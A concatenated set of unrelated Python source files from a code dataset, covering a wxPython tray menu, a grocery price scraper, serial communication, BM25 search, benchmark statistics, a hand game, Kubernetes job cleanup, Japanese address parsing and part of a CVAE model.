self.initUI()\n self.initBind()\n\n # generate widget IDs\n def initID(self):\n self.ViewID = wx.NewId()\n\n # build the UI\n def initUI(self):\n self.settings()\n\n # event bindings\n def initBind(self):\n self.Bind(wx.adv.EVT_TASKBAR_LEFT_DCLICK, self.OnDclick)\n # listen for the exit entry in the menu bar\n\n # basic settings\n def settings(self):\n from wx.lib.embeddedimage import PyEmbeddedImage\n icon = PyEmbeddedImage(B64_POKER128).GetIcon()\n if self.MainFrame.IsShown():\n self.MainFrame.Hide()\n self.SetIcon(icon, u'游戏进程管理器')\n\n # build the tray menu; by default a right click calls PopupMenu to show it\n def CreatePopupMenu(self):\n self.TaskBarIconMenu = wx.Menu()\n # self.ExitMenu = wx.Menu()\n\n self.TaskBarIconMenu.AppendSeparator()\n self.TaskBarIconMenu.Append(self.ViewID, u\"显示主界面(&M)\")\n self.TaskBarIconMenu.Append(ID_OpenDir, u\"打开目录(&O)\", u\"打开目录\")\n self.TaskBarIconMenu.AppendSeparator()\n self.TaskBarIconMenu.Append(wx.ID_EXIT, u\"退出(&X)\")\n\n self.TaskBarIconMenu.Bind(wx.adv.EVT_TASKBAR_LEFT_DCLICK, self.OnDclick)\n self.TaskBarIconMenu.Bind(wx.EVT_MENU, self.OnDclick, id=self.ViewID)\n self.TaskBarIconMenu.Bind(wx.EVT_MENU, self.OpenWorkDir, id=ID_OpenDir)\n self.TaskBarIconMenu.Bind(wx.EVT_MENU, self.OnExit, id=wx.ID_EXIT)\n return self.TaskBarIconMenu\n\n # single click, currently unused\n def OnClick(self, e):\n self.MainFrame.IsIconized()\n if e:\n e.Skip()\n\n # double click restores the main frame\n def OnDclick(self, e):\n # Destroy removes the icon; it cannot be recreated afterwards\n self.Destroy()\n self.MainFrame.Restore()\n self.MainFrame.Raise()\n if e:\n e.Skip()\n\n def OpenWorkDir(self, e):\n toolpath = os.path.splitext(scriptPath)[0] + '.exe'\n explorer_select_file(toolpath)\n if e:\n e.Skip()\n\n # exit\n def OnExit(self, e):\n # destroy the tray icon\n self.Destroy()\n # destroy the main frame\n # self.MainFrame.Destroy()\n self.MainFrame.OnExit(e)\n # quit the wx process\n # wx.Exit()\n if e:\n e.Skip()\n\n\n# TODO: main application\nclass NewApp(wx.App):\n def __init__(self):\n super(NewApp, self).__init__(redirect=sys.stderr, filename='./ProcessManagerError.log')\n\n def OnInit(self):\n window = RootFrame()\n window.Show()\n return True\n\n\nif __name__ == '__main__':\n multiprocessing.freeze_support()\n app = NewApp()\n app.MainLoop()\n # pyinstaller -w -F -p \"E:\\Git\\wxPython\\common;C:\\Python27\" -i E:\\Git\\wxPython\\icon\\poker.ico ProcessManager.py\n","sub_path":"ProcessManager - 副本.py","file_name":"ProcessManager - 副本.py","file_ext":"py","file_size_in_byte":62283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"432273697","text":"from bs4 import BeautifulSoup\nfrom selenium import webdriver\nimport csv\nimport core_shopping_list\n\ndef metro_parse(url, substitution=dict()):\n ### Note: this function parses only the FIRST page of each URL ###\n browser = webdriver.PhantomJS()\n browser.get(url)\n html = browser.page_source\n soup = BeautifulSoup(html, 'html.parser')\n section = soup.find(\"div\",{\"class\": \"items\"})\n articles = section.find_all(\"div\",{\"class\":\"catalog-i\"})\n products = []\n for article in articles:\n name_src = article.find(\"span\",{\"class\":\"title\"})\n art = article.find(\"span\",{\"class\":\"article\"})\n price_full = article.find(\"div\",{\"price_cnt\"})\n price_int_src = price_full.find(\"span\",{\"class\":\"int\"})\n price_float_src = price_full.find(\"span\",{\"class\":\"float\"})\n name = name_src.text\n price = price_int_src.text + '.' 
+ price_float_src.text\n for key in substitution:\n if name == key:\n products.append({\n 'title': substitution[key],\n 'price': price\n })\n return products\n\ndef main():\n change = core_shopping_list.substitution('metro')\n\n url_list = ['https://msk.metro-cc.ru/category/produkty/bakaleya/makaronnye-izdeliya?price_range=11%3B1361&brands=&in_stock=1&attrs=&sorting=0&limit=72&virtual_stock=0',\n 'https://msk.metro-cc.ru/category/produkty/ovoschi-griby/101009003-konservirovannye?price_range=27%3B3397&brands=&in_stock=1&attrs=&attr%5B253%5D%5Bfrom%5D=0&attr%5B253%5D%5Bto%5D=0&sorting=0&limit=72&virtual_stock=0',\n 'https://msk.metro-cc.ru/category/produkty/holodnye-napitki/soki-morsy-nektary?price_range=15%3B1693&brands=&in_stock=1&attrs=&attr%5B181%5D%5Bfrom%5D=0&attr%5B181%5D%5Bto%5D=0&sorting=0&limit=72&virtual_stock=0',\n ]\n\n product_list_metro = []\n for url in url_list:\n for page in range(1, 10):\n url_page = url + '&page=' + str(page)\n product_list_metro += metro_parse(url_page, change)\n temp = []\n for item in product_list_metro:\n if item not in temp:\n temp.append(item)\n product_list_metro = temp\n with open('metro.csv', 'w', encoding='utf-8') as f:\n fields = ['title', 'price']\n writer = csv.DictWriter(f, fields, delimiter=';')\n for item in product_list_metro:\n writer.writerow(item)\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"metro_parser.py","file_name":"metro_parser.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"52280352","text":"# -*- encoding: utf-8 -*-\n\nimport json\nfrom threading import Thread\nimport logging\nimport serial\nimport time\n\nlogger = logging.getLogger(__name__)\n\n\nclass WarehouseCommunicator(Thread):\n x = 0\n y = 0\n z = 0\n\n def __init__(self, level=logging.INFO, port='/dev/ttyAMA0', baudrate=115200,\n parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE,\n bytesize=serial.EIGHTBITS):\n Thread.__init__(self)\n logging.basicConfig()\n logger.setLevel(level)\n formatter = logging.Formatter(\"%(asctime)s %(threadName)-11s %(levelname)-10s %(message)s\")\n self.serial = serial.Serial(port=port, baudrate=baudrate, bytesize=bytesize,\n stopbits=stopbits, parity=parity, timeout=3.0)\n self.daemon = True\n logger.info(\"STM <--> Raspberry communication started!\")\n\n def run(self):\n while True:\n for line in self.serial:\n try:\n parsed_line = json.loads(line[-29:])\n if parsed_line['x'] != self.x or parsed_line['y'] != self.y or parsed_line['z'] != self.z:\n logger.info(\"Received: \" + line)\n\n self.x = parsed_line['x']\n self.y = parsed_line['y']\n self.z = parsed_line['z']\n except Exception as exc:\n logger.error(exc)\n\n def send(self, command, value=99):\n if value < 0:\n value = 0\n logger.error(\"Wrong value!\" + ':' + str(command).zfill(2) + '-' + str(value).zfill(8))\n\n command_string = ':' + str(command).zfill(2) + '-' + str(value).zfill(8) + '\\r\\n'\n logger.debug(\"Sent: \" + command_string)\n self.serial.write(command_string)\n time.sleep(0.01)\n","sub_path":"WarehouseServer/serial_thread.py","file_name":"serial_thread.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"494755600","text":"from gensim.summarization import bm25\nfrom glob import glob\nimport re\nfrom heapq import nlargest\n\n\nclass Utils:\n word_regex = r\"[\\w'-]+\"\n\n def __init__(self, collection_path):\n corpus = []\n self.test_files = 
glob(collection_path + '*.txt')\n self.num_docs = len(self.test_files)\n for file in self.test_files:\n doc = []\n with open(file) as text:\n for line in text:\n for word in re.findall(Utils.word_regex, line):\n doc.append(word.lower())\n corpus.append(doc)\n self.bm25_obj = bm25.BM25(corpus=corpus)\n self.avg_idf = sum(map(lambda k: float(self.bm25_obj.idf[k]), self.bm25_obj.idf.keys())) / len(\n self.bm25_obj.idf.keys())\n\n def best(self, n: int, query_str: str):\n query_doc = [word.lower() for word in re.findall(Utils.word_regex, query_str)]\n scores = self.bm25_obj.get_scores(query_doc, self.avg_idf)\n doc_ids = [i for i in range(self.num_docs)]\n best_ids = nlargest(n, doc_ids, key=lambda i: scores[i])\n return [self.test_files[doc_id] for doc_id in best_ids]\n\n\nif __name__ == '__main__':\n utils = Utils('D:/test files/')\n print(utils.best(3, 'France'))\n","sub_path":"BM25/bm25_utils.py","file_name":"bm25_utils.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"107422832","text":"import sys\nimport os\nimport math\nfrom operator import add\nimport statistics\nfrom scipy.stats import t\nfrom itertools import zip_longest\n\nimport click\n\nBASE_PATH = os.path.dirname(os.path.realpath(__file__))\nDATA_PATH = os.path.join(BASE_PATH, \"../../stats\")\n\n\nMEAN_MAX = 9999999\n\n@click.group()\ndef cli():\n pass\n\n@cli.command()\n@click.argument('path')\n@click.argument('prefix')\ndef db(path, prefix):\n global DATA_PATH\n if not os.path.isdir(path):\n click.echo('{}: {}'\n .format(sys.argv[0],\n click.style('provided path `'+path+'` is no directory', fg='red')))\n sys.exit(1)\n DATA_PATH = os.path.join(BASE_PATH, \"../../stats\", prefix)\n if not os.path.exists(DATA_PATH):\n os.makedirs(DATA_PATH)\n analyze_logs(path)\n\n\ndef analyze_logs(path):\n subdirs = [os.path.join(path, p) for p in os.listdir(path) if os.path.isdir(os.path.join(path, p))]\n\n # reach leaf directory, try to analyze\n if len(subdirs) == 0:\n if path.find('response-time') != -1:\n analyze_db_leaf(path)\n else:\n for p in subdirs:\n click.echo(p)\n if p.find('middleware') != -1:\n analyze_mw_logs(p)\n elif p.find('mload') != -1 or p.find('middleware') != -1:\n analyze_mload_logs(p)\n else:\n analyze_logs(p)\n\n\ndef analyze_mw_logs(path):\n subdirs = [os.path.join(path, p) for p in os.listdir(path) if os.path.isdir(os.path.join(path, p))]\n\n for sp in subdirs:\n if sp.find('backendDuration') != -1 or sp.find('totalDuration') != -1 or sp.find('backendQueue') != -1:\n analyze_mw_leaf(sp, os.path.basename(path))\n\ndef analyze_mload_logs(path):\n subdirs = [os.path.join(path, p) for p in os.listdir(path) if os.path.isdir(os.path.join(path, p))]\n\n num_threads = path.split('-')[-1]\n data = {}\n for p in subdirs:\n data[p] = analyze_db_leaf(p)\n\n fpath = os.path.join(DATA_PATH, get_name(path), num_threads+'')\n if not os.path.exists(fpath):\n os.makedirs(fpath)\n\n (tp_mean, tp_stdev, rt_mean, rt_stdev, gi) = calculate_stats(data, fpath)\n\n\n click.echo('mload summary response-time mean: {:10.3f}\\t\\tstdev: {:10.3f}'.format(rt_mean, rt_stdev))\n\n with open(os.path.join(os.path.join(DATA_PATH, 'mload/mload-response-time-stats.txt')), 'a') as f:\n f.write(num_threads+'\\t')\n f.write('\\t'.join('{:10.3f}'.format(x) for x in [rt_mean, rt_stdev]))\n f.write('\\n')\n\n click.echo('throughput mean: {:10.3f}\\t\\tstdev: {:10.3f}'.format(tp_mean, tp_stdev))\n with open(os.path.join(os.path.join(DATA_PATH, 
'mload/mload-throughput-stats.txt')), 'a') as f:\n f.write(num_threads+'\\t')\n f.write('\\t'.join('{:10.3f}'.format(x) for x in [tp_mean, tp_stdev]))\n f.write('\\n')\n\n\ndef grouper(iterable, n, fillvalue=None):\n args = [iter(iterable)] * n\n return zip_longest(*args, fillvalue=fillvalue)\n\ndef calculate_stats(data, path, no_calc=False):\n click.echo(\"Use path \"+path)\n f_rt_over_time = open(os.path.join(path, 'response-time-over-time.txt'), 'wt')\n f_tp_over_time = open(os.path.join(path, 'throughput-over-time.txt'), 'wt')\n f_rt = open(os.path.join(path, 'experiment-response-time.txt'), 'wt')\n f_tp = open(os.path.join(path, 'experiment-throughput.txt'), 'wt')\n\n tp_over_time = []\n throughputs = []\n tp_experiments = []\n rt_experiments = []\n\n tp_experiment_collector = []\n rt_experiment_collector = []\n\n flat_rts = []\n grouped_intervals = []\n\n count = 0\n i = 0\n for interval_data in zip(*data.values()):\n flat_interval = [x for l in interval_data for x in l]\n flat_rts += flat_interval\n grouped_intervals.append(flat_interval)\n throughputs.append(len(flat_interval))\n \n if no_calc: continue\n try:\n f_tp_over_time.write('{}\\t{:10.3f}\\n'.format(i, len(flat_interval)))\n mean = statistics.mean(flat_interval)\n f_rt_over_time.write('{}\\t{:10.3f}\\t{:10.3f}\\n'.format(i, mean,\n statistics.stdev(flat_interval, mean)))\n i += 1\n except statistics.StatisticsError as e:\n click.echo(click.style('Interval {} is empty'.format(len(throughputs)+1)))\n\n if len(tp_experiment_collector) == 60:\n mean = statistics.mean(tp_experiment_collector)\n stdev = statistics.stdev(tp_experiment_collector, mean)\n f_tp.write('{}\\t{:10.3f}\\t{:10.3f}\\n'.format(count, mean, stdev))\n tp_experiments.append((mean, stdev))\n tp_experiment_collector = []\n count += 5\n tp_experiment_collector.append(len(flat_interval))\n\n if no_calc:\n return (0, 0, 0, 0, grouped_intervals)\n\n click.echo('calculate TP confidence for {} with {} samples'.format(path, len(tp_experiments)))\n tp_mean, tp_stdev, found = get_confidence_interval(tp_experiments, 0.15)\n if not found:\n click.echo(click.style(\"Throughput: Could not match confidence interval\", fg='red'))\n rt_stats = []\n count = 0\n for experiment in grouper(flat_rts, 100000, MEAN_MAX):\n if experiment[-1] == MEAN_MAX:\n break\n mean = statistics.mean(experiment)\n stdev = statistics.stdev(experiment, mean)\n f_rt.write('{}\\t{:10.3f}\\t{:10.3f}\\n'.format(count,mean, stdev))\n count += 1\n rt_stats.append((mean, stdev))\n\n click.echo('calculate RT confidence for {} with {} samples'.format(path, len(rt_stats)))\n rt_mean, rt_stdev, found = get_confidence_interval(rt_stats, 0.05)\n if not found:\n click.echo(click.style(\"Response Time: Could not match confidence interval\", fg='red'))\n\n return (tp_mean, tp_stdev, rt_mean, rt_stdev, grouped_intervals)\n\n\ndef get_confidence_interval(experiment, signi):\n tt = t.ppf(1-(signi/2.0), len(experiment)-1)\n\n #click.echo(experiment)\n gmean = MEAN_MAX\n gstdev = MEAN_MAX\n min_error = MEAN_MAX\n found = False\n for (mean, stdev) in experiment:\n invalid_count = 0\n mmax = mean + tt * (stdev / math.sqrt(len(experiment)))\n mmin = mean - tt * (stdev / math.sqrt(len(experiment)))\n\n for (om, _) in experiment:\n if om < mmin or om > mmax:\n invalid_count += 1\n\n error = invalid_count / float(len(experiment))\n #click.echo('{:10.3f} {:10.3f} {:10.3f}'.format(mean, mmax, mmin, error))\n if error <= signi:\n #click.echo('found with error {} {}'.format(error, stdev))\n if not found:\n gmean = mean\n gstdev = 
stdev\n else:\n if gstdev > stdev:\n gmean = mean\n gstdev = stdev\n found = True\n else:\n if (not found) and error < min_error:\n gmean = mean\n gstdev = stdev\n min_error = min(min_error, error)\n\n click.echo('min error {}'.format(min_error))\n return gmean, gstdev, found\n\n\n\ndef analyze_mw_leaf(path, name):\n click.echo(\"Analyze mw logs: \"+path)\n\n fpath = os.path.join(DATA_PATH, name, os.path.basename(path))\n if not os.path.exists(fpath):\n os.makedirs(fpath)\n\n data = {}\n for _, _, files in os.walk(path):\n for fname in files:\n if fname.find('.txt') != -1:\n continue\n with open(os.path.join(path, fname)) as f:\n intervals = []\n current_interval = []\n for row in f.readlines():\n if row.find(\":\") == -1:\n # normalize to milliseconds\n if path.find('backendDuration') != -1 or path.find('totalDuration') != -1:\n current_interval.append(int(row.split('\\t')[-1])/1000.0)\n else:\n current_interval.append(int(row)/1000.0)\n else:\n intervals.append(current_interval)\n current_interval = []\n data[fname] = intervals\n\n (tp_mean, tp_stdev, rt_mean, rt_stdev, gi) = calculate_stats(data, fpath)\n click.echo('response-time mean: {:10.3f}\\t\\tstdev: {:10.3f}'.format(rt_mean, rt_stdev))\n\n with open(os.path.join(DATA_PATH, os.path.basename(path)+'-response-time-stats.txt'), 'a') as f:\n f.write(name.split('-')[-1]+\"\\t\")\n f.write('\\t'.join('{:10.3f}'.format(x) for x in [rt_mean, rt_stdev]))\n f.write('\\n')\n\n click.echo('throughput mean: {:10.3f}\\t\\tstdev: {:10.3f}'.format(tp_mean, tp_stdev))\n with open(os.path.join(DATA_PATH, os.path.basename(path)+'-throughput-stats.txt'), 'a') as f:\n f.write(name.split('-')[-1]+\"\\t\")\n f.write('\\t'.join('{:10.3f}'.format(x) for x in [tp_mean, tp_stdev]))\n f.write('\\n')\n\n\ndef get_name(path):\n for n in ['mpeek', 'msend', 'mpop', 'mquery', 'mecho', 'peek', 'send', 'pop', 'mload']:\n if path.find(n) != -1:\n return n\n\n\ndef analyze_db_leaf(path):\n click.echo(\"Analyze logs: \"+path)\n typ, num_threads = os.path.basename(path).split('-')[0], path.split('-')[-1]\n if get_name(path) == 'mload':\n fpath = os.path.join(DATA_PATH, get_name(path), typ+'-'+num_threads)\n if not os.path.exists(fpath):\n os.makedirs(fpath)\n else:\n fpath = os.path.join(DATA_PATH, get_name(path), num_threads)\n if not os.path.exists(fpath):\n os.makedirs(fpath)\n\n data = {}\n for _, _, files in os.walk(path):\n for fname in files:\n\n if fname.find('.txt') != -1:\n continue\n with open(os.path.join(path, fname)) as f:\n intervals = []\n current_interval = []\n for row in f.readlines():\n if row.find(\"B\") == -1 and row.find('b') == -1:\n # normalize to milliseconds\n parts = row.split('\\t')\n current_interval.append(int(parts[-1])/1000.0)\n else:\n intervals.append(current_interval)\n current_interval = []\n data[fname] = intervals\n\n (tp_mean, tp_stdev, rt_mean, rt_stdev, gi) = calculate_stats(data, fpath)\n\n\n click.echo('response-time mean: {:10.3f}\\t\\tstdev: {:10.3f}'.format(rt_mean, rt_stdev))\n\n with open(os.path.join(os.path.join(DATA_PATH, get_name(path)), typ+'-response-time-stats.txt'), 'a') as f:\n f.write(num_threads+'\\t')\n f.write('\\t'.join('{:10.3f}'.format(x) for x in [rt_mean, rt_stdev]))\n f.write('\\n')\n\n click.echo('throughput mean: {:10.3f}\\t\\tstdev: {:10.3f}'.format(tp_mean, tp_stdev))\n with open(os.path.join(os.path.join(DATA_PATH, get_name(path)), typ+'-throughput-stats.txt'), 'a') as f:\n f.write(num_threads+'\\t')\n f.write('\\t'.join('{:10.3f}'.format(x) for x in [tp_mean, tp_stdev]))\n f.write('\\n')\n\n 
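    # NOTE: `gi` below is the list of per-interval response-time samples
    # (`grouped_intervals` returned by calculate_stats); analyze_mload_logs
    # appears to rely on this return value to pool samples across sub-directories.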
return gi\n\n\nif __name__ == '__main__':\n cli()\n","sub_path":"scripts/plot/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":10984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"469162271","text":"import random\r\n\r\nresults = [(\"rock\", \"scissors\"), (\"scissors\", \"paper\"),(\"paper\", \"rock\"), (\"rock\", \"lizard\"), (\"lizard\",\"spock\"),\r\n (\"spock\", \"scissors\"), (\"scissors\", \"lizard\"), (\"lizard\", \"paper\"), (\"paper\", \"spock\"), (\"spock\", \"rock\")]\r\nmoves = [result[0] for result in results]\r\n\r\nplayer_score, computer_score =(0, 0)\r\nplayer = input(\"Enter rock / paper / scissors / lizard / spock / quit: \").lower()\r\nwhile player != \"quit\":\r\n computer = random.choice(moves)\r\n print(\"You Chose {}, I Chose {}\".format(player,computer))\r\n if player == computer:\r\n print(\"Its a Tie!\")\r\n elif(player, computer) in results:\r\n print(\"You Win\")\r\n player_score += 1\r\n elif(computer, player) in results:\r\n print(\"I Win!\")\r\n computer_score += 1\r\n else:\r\n print(\"Invalid Input\")\r\n player = input(\" Enter rock / paper / scissors / lizard / spock /quit: \").lower()\r\n\r\nprint(\"FINAL SCORE\")\r\nprint(\"You: {} Me: {}\".format(player_score, computer_score))","sub_path":"RockPaperScissorsLizaedSpock.py","file_name":"RockPaperScissorsLizaedSpock.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"225366994","text":"import os\nimport logging\nimport logging.config\nfrom pythonjsonlogger import jsonlogger\nfrom datetime import datetime;\nimport requests\nimport time\n\nfrom kubernetes import client, config, utils\nimport kubernetes.client\nfrom kubernetes.client.rest import ApiException\n\nclass ElkJsonFormatter(jsonlogger.JsonFormatter):\n def add_fields(self, log_record, record, message_dict):\n super(ElkJsonFormatter, self).add_fields(log_record, record, message_dict)\n log_record['@timestamp'] = datetime.now().isoformat()\n log_record['level'] = record.levelname\n log_record['logger'] = record.name\n\nlogging.config.fileConfig('logging.conf')\nlogger = logging.getLogger('inspector')\n\nLOG_LEVEL = os.getenv('LOG_LEVEL', 'INFO').upper()\nFILE_PROCESSOR = \"file-processor\"\n\n# Setup K8 configs\nconfig.load_kube_config()\nconfiguration = kubernetes.client.Configuration()\napi_instance = kubernetes.client.BatchV1Api(kubernetes.client.ApiClient(configuration))\n\ndef kube_delete_empty_pods(namespace='default', phase='Succeeded'):\n \"\"\"\n Pods are never empty, just completed the lifecycle.\n As such they can be deleted.\n Pods can be without any running container in 2 states:\n Succeeded and Failed. 
This call doesn't terminate Failed pods by default.\n \"\"\"\n # The always needed object\n #deleteoptions = client.V1DeleteOptions()\n # We need the api entry point for pods\n api_pods = client.CoreV1Api()\n # List the pods\n try:\n pods = api_pods.list_namespaced_pod(namespace)\n except ApiException as e:\n logging.error(\"Exception when calling CoreV1Api->list_namespaced_pod: %s\\n\" % e)\n return\n\n for pod in pods.items:\n logging.debug(pod)\n podname = pod.metadata.name\n if not podname.startswith(FILE_PROCESSOR):\n continue \n try:\n if pod.status.phase == phase:\n api_response = api_pods.delete_namespaced_pod(podname, namespace, body={})\n logging.info(\"Pod: {} deleted!\".format(podname))\n logging.debug(api_response)\n else:\n logging.info(\"Pod: {} still not done... Phase: {}\".format(podname, pod.status.phase))\n except ApiException as e:\n logging.error(\"Exception when calling CoreV1Api->delete_namespaced_pod: %s\\n\" % e)\n \n return\n\ndef kube_cleanup_finished_jobs(namespace='default', state='Finished'):\n \n \"\"\"\n Since the TTL flag (ttl_seconds_after_finished) is still in alpha (Kubernetes 1.12) jobs need to be cleanup manually\n As such this method checks for existing Finished Jobs and deletes them.\n By default it only cleans Finished jobs. Failed jobs require manual intervention or a second call to this function.\n Docs: https://kubernetes.io/docs/concepts/workloads/controllers/jobs-run-to-completion/#clean-up-finished-jobs-automatically\n For deletion you need a new object type! V1DeleteOptions! But you can have it empty!\n CAUTION: Pods are not deleted at the moment. They are set to not running, but will count for your autoscaling limit, so if\n pods are not deleted, the cluster can hit the autoscaling limit even with free, idling pods.\n To delete pods, at this moment the best choice is to use the kubectl tool\n ex: kubectl delete jobs/JOBNAME.\n But! If you already deleted the job via this API call, you now need to delete the Pod using Kubectl:\n ex: kubectl delete pods/PODNAME\n \"\"\"\n #deleteoptions = client.V1DeleteOptions()\n try: \n jobs = api_instance.list_namespaced_job(namespace)\n #print(jobs)\n except ApiException as e:\n print(\"Exception when calling BatchV1Api->list_namespaced_job: %s\\n\" % e)\n return\n \n # Now we have all the jobs, lets clean up\n # We are also logging the jobs we didn't clean up because they either failed or are still running\n for job in jobs.items:\n logging.debug(job)\n jobname = job.metadata.name\n jobstatus = job.status.conditions\n if not jobname.startswith(FILE_PROCESSOR):\n continue\n if job.status.succeeded == 1:\n # Clean up Job\n logging.info(\"Cleaning up Job: {}. Finished at: {}\".format(jobname, job.status.completion_time))\n try: \n # What is at work here. Setting Grace Period to 0 means delete ASAP. Otherwise it defaults to\n # some value I can't find anywhere. Propagation policy makes the Garbage cleaning Async\n api_response = api_instance.delete_namespaced_job(jobname,\n namespace)\n logging.debug(api_response)\n except ApiException as e:\n print(\"Exception when calling BatchV1Api->delete_namespaced_job: %s\\n\" % e)\n else:\n if jobstatus is None and job.status.active == 1:\n jobstatus = 'active'\n logging.info(\"Job: {} not cleaned up. 
Current status: {}\".format(jobname, jobstatus))\n \n # Now that we have the jobs cleaned, let's clean the pods\n kube_delete_empty_pods(namespace)\n # And we are done!\n return\n\ndef kube_processor_jobs_running(namespace='default', state='Finished'):\n \n try: \n jobs = api_instance.list_namespaced_job(namespace)\n #print(jobs)\n except ApiException as e:\n print(\"Exception when calling BatchV1Api->list_namespaced_job: %s\\n\" % e)\n return True\n \n # Now we have all the jobs, lets clean up\n # We are also logging the jobs we didn't clean up because they either failed or are still running\n for job in jobs.items:\n logging.debug(job)\n jobname = job.metadata.name\n jobstatus = job.status.conditions\n if jobname.startswith(FILE_PROCESSOR):\n return True\n \n return False\n\n\nclass Main():\n\n @staticmethod\n def log_level(level):\n logging.basicConfig(level=getattr(logging, level))\n\n @staticmethod\n def run_processor():\n\n while kube_processor_jobs_running():\n logger.debug(\"Previous job still running\")\n kube_cleanup_finished_jobs()\n time.sleep(1)\n\n job_name = FILE_PROCESSOR\n\n envs = [client.V1EnvVar(name=\"API_TOKEN\", value=os.getenv(\"API_TOKEN\"))]\n\n processor_container = client.V1Container(\n name=\"processor\",\n image=os.getenv(\"PROCESSOR_IMAGE\", \"ggrig/k8-traffic:re_processor\"),\n env=envs)\n\n pod_spec = client.V1PodSpec(\n restart_policy=\"Never\",\n containers=[processor_container])\n\n # Create and configure a spec section\n template = client.V1PodTemplateSpec(\n metadata=client.V1ObjectMeta(name=job_name, labels={\n \"app\": \"file-rebuild-processor\"}),\n spec=pod_spec)\n\n # Create the specification of the job\n spec = client.V1JobSpec(\n template=template,\n backoff_limit=0)\n\n # Instantiate the job object\n job = client.V1Job(\n api_version=\"batch/v1\",\n kind=\"Job\",\n metadata=client.V1ObjectMeta(name=job_name),\n spec=spec)\n\n logger.info(\"trying to create a job:\" + job_name)\n client.BatchV1Api().create_namespaced_job(\n body=job,\n namespace=\"default\")\n\n @staticmethod\n def application():\n\n # No Loop debug run\n #Main.run_processor()\n #return\n \n while True:\n try:\n Main.run_processor()\n except Exception as e:\n logger.error(e)\n\n @staticmethod\n def main():\n Main.log_level(LOG_LEVEL)\n Main.application()\n\nif __name__ == \"__main__\":\n Main.main()\n","sub_path":"upwork-devs/harut-gigoryan/rebuild-engine/inspector/inspector.py","file_name":"inspector.py","file_ext":"py","file_size_in_byte":7786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"83703462","text":"# -*- coding: utf-8 -*-\nimport logging\n\nfrom pkg_resources import resource_stream\n\nfrom parsel import Selector\n\n\n__version__ = '0.1.2'\n\n\nlogger = logging.getLogger(__name__)\n\n\nPREFECTURES_DATA = dict([l.decode('utf8').split() for l in resource_stream('japanese_address', 'data/prefs.dat')])\nJAPANESE_PREFECTURES = list(PREFECTURES_DATA.keys())\n\n\ndef load_wiki(datafile, endchar):\n sel = Selector(text=resource_stream('japanese_address', datafile).read().decode('utf8'))\n for trow in sel.xpath('//tr'):\n japtext = trow.xpath('.//*[@lang=\"ja\"]/text()').extract()\n if japtext and japtext[0].endswith(endchar):\n engtext = trow.xpath('.//*[@lang=\"ja\"]/ancestor::td/preceding-sibling::td//text()').extract()[-1]\n if engtext:\n yield japtext[0], engtext\n\n\nCITIES_DATA = dict(load_wiki('data/cities.html', \"市\"))\nWARDS_DATA = dict(load_wiki('data/wards.html', \"区\"))\nTOWNS_DATA = 
dict(load_wiki('data/towns.html', \"町\"))\n\n\ndef _parse_prefecture(txt):\n for pref in JAPANESE_PREFECTURES:\n start = txt.find(pref)\n if start >= 0:\n return txt[start:len(pref)].strip()\n\n\ndef _parse_divisor(txt, divisor, dlen):\n start = txt.find(divisor)\n if start >= 0:\n return txt[0:start+dlen].strip()\n\n\ndef _parse_level(div, kanji, parsed):\n dlen = len(kanji)\n if parsed.get('unparsed_right'):\n entity = _parse_divisor(parsed['unparsed_right'], kanji, dlen)\n if entity:\n parsed[div] = entity\n parsed['unparsed_right'] = parsed['unparsed_right'].split(entity, 1)[1].strip()\n elif parsed.get('unparsed_left'):\n entity = _parse_divisor(parsed['unparsed_left'], kanji, dlen)\n if entity:\n parsed[div] = entity\n parsed['unparsed_left'] = parsed['unparsed_left'].split(entity, 1)[1].strip()\n\n\ndef parse(txt):\n \"\"\"\n >>> parse('北海道 札幌市 中央区北5条西4-7')\n >>> parse('東京都江東区豊洲2丁目4-9')\n \"\"\"\n parsed = {}\n pref = _parse_prefecture(txt)\n if pref:\n parsed['prefecture'] = pref\n parsed['prefecture_eng'] = PREFECTURES_DATA[pref]\n reml, remr = txt.split(pref, 1)\n if reml:\n parsed['unparsed_left'] = reml.strip()\n if remr:\n parsed['unparsed_right'] = remr.strip()\n else:\n parsed['unparsed_right'] = txt\n\n _parse_level('city', \"市\", parsed)\n if 'city' in parsed:\n parsed['city_eng'] = CITIES_DATA[parsed['city']]\n _parse_level('ward', \"区\", parsed)\n if 'ward' in parsed:\n parsed['ward_eng'] = WARDS_DATA[parsed['ward']]\n _parse_level('district', \"郡\", parsed)\n _parse_level('town', \"町\", parsed)\n if 'town' in parsed:\n if parsed['town'] in TOWNS_DATA:\n parsed['town_eng'] = TOWNS_DATA[parsed['town']]\n else:\n logger.warning(f\"Town {parsed['town']} not in database\")\n _parse_level('city_district', \"丁目\", parsed)\n\n return parsed\n","sub_path":"japanese_address/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"385090740","text":"import numpy as np\n\nfrom keras.layers import Input, Dense, Lambda\nfrom keras.layers.merge import concatenate\nfrom keras.models import Model, Sequential\n\nimport keras.backend as K\n\nfrom models import vgg\n\nfrom utils.losses import gaussian_kl_divergence_tf, gaussian_kl_divergence_np\nfrom utils.losses import von_mises_log_likelihood_tf, von_mises_log_likelihood_np\nfrom utils.angles import deg2bit, bit2deg, bit2deg_multi\nfrom utils.losses import maad_from_deg, maximum_expected_utility, importance_loglikelihood\nfrom scipy.stats import sem\n\n\nclass CVAE:\n\n def __init__(self,\n image_height=50,\n image_width=50,\n n_channels=3,\n n_hidden_units=8,\n kl_weight=1.0):\n\n self.n_u = n_hidden_units\n self.image_height = image_height\n self.image_width = image_width\n self.n_channels = n_channels\n self.phi_shape = 2\n self.kl_weight = 